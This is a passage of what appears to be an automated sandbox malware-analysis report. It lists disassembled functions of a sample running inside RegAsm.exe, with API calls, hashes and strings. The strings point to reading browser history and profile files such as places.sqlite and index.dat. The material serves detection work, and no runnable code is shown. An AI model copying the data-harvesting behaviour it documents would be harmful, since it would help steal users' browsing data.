                                                          • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                          Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                          • memcmp.MSVCRT ref: 00444BA5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$memcmp
                                                          • String ID: $$8
                                                          • API String ID: 2808797137-435121686
                                                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                          Function 00430737 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • too many columns on %s, xrefs: 00430763
                                                          • duplicate column name: %s, xrefs: 004307FE
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: duplicate column name: %s$too many columns on %s
                                                          • API String ID: 0-1445880494
                                                          • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                          • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                          • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                          • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                          Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                            • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                            • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                            • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                            • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                          • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                            • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                          • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                          • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                            • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                          • String ID:
                                                          • API String ID: 1042154641-0
                                                          • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                          • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                          • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                          • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                          Function 00414C2E Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                          • memset.MSVCRT ref: 00414C87
                                                          • wcscpy.MSVCRT ref: 00414CFC
                                                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressProcVersionmemsetwcscpy
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                          • API String ID: 4182280571-2036018995
                                                          • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                          • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                          Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                          • memset.MSVCRT ref: 00403A55
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                          • String ID: history.dat$places.sqlite
                                                          • API String ID: 3093078384-467022611
                                                          • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                          • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                          Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                          • GetLastError.KERNEL32 ref: 00417627
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$File$PointerRead
                                                          • String ID:
                                                          • API String ID: 839530781-0
                                                          • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                          • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                          Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID: *.*$index.dat
                                                          • API String ID: 1974802433-2863569691
                                                          • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                          • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                          Function 004099F4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@mallocmemcpy
                                                          • String ID:
                                                          • API String ID: 3831604043-0
                                                          • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                          • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                          • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                          • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                          Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                          • GetLastError.KERNEL32 ref: 004175A2
                                                          • GetLastError.KERNEL32 ref: 004175A8
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$FilePointer
                                                          • String ID:
                                                          • API String ID: 1156039329-0
                                                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                          Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$ChangeCloseCreateFindNotificationTime
                                                          • String ID:
                                                          • API String ID: 1631957507-0
                                                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                          Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                          • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Temp$DirectoryFileNamePathWindows
                                                          • String ID:
                                                          • API String ID: 1125800050-0
                                                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                          Function 00415320 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • failed memory resize %u to %u bytes, xrefs: 00415358
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: realloc
                                                          • String ID: failed memory resize %u to %u bytes
                                                          • API String ID: 471065373-2134078882
                                                          • Opcode ID: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                                                          • Instruction ID: af22f86c8d97814ed0bf188a45fefa7fc909daabc8cee38fca791e75313f3e85
                                                          • Opcode Fuzzy Hash: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                                                          • Instruction Fuzzy Hash: 49F027B3A01605A7D2109A55DC418CBF3DCDFC4655B06082FF998D3201E168E88083B6
                                                          Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: d
                                                          • API String ID: 0-2564639436
                                                          • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                          • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                          • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                          • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                          Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID: BINARY
                                                          • API String ID: 2221118986-907554435
                                                          • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                          • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                          • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                          • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                          Function 004104FB Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                            • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                            • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                          • String ID:
                                                          • API String ID: 1161345128-0
                                                          • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                          • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                          Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _wcsicmp
                                                          • String ID: /stext
                                                          • API String ID: 2081463915-3817206916
                                                          • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                          • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                          • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                          • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                          Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                          • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                          • String ID:
                                                          • API String ID: 159017214-0
                                                          • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                          • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                          • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                          • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                          Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                          • String ID:
                                                          • API String ID: 3150196962-0
                                                          • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                          • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                          Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: malloc
                                                          • String ID: failed to allocate %u bytes of memory
                                                          • API String ID: 2803490479-1168259600
                                                          • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                          • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                          • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                          • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                          Function 0040B1AB Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@
                                                          • String ID:
                                                          • API String ID: 613200358-0
                                                          • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                          • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                          • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                          • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                          Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcmpmemset
                                                          • String ID:
                                                          • API String ID: 1065087418-0
                                                          • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
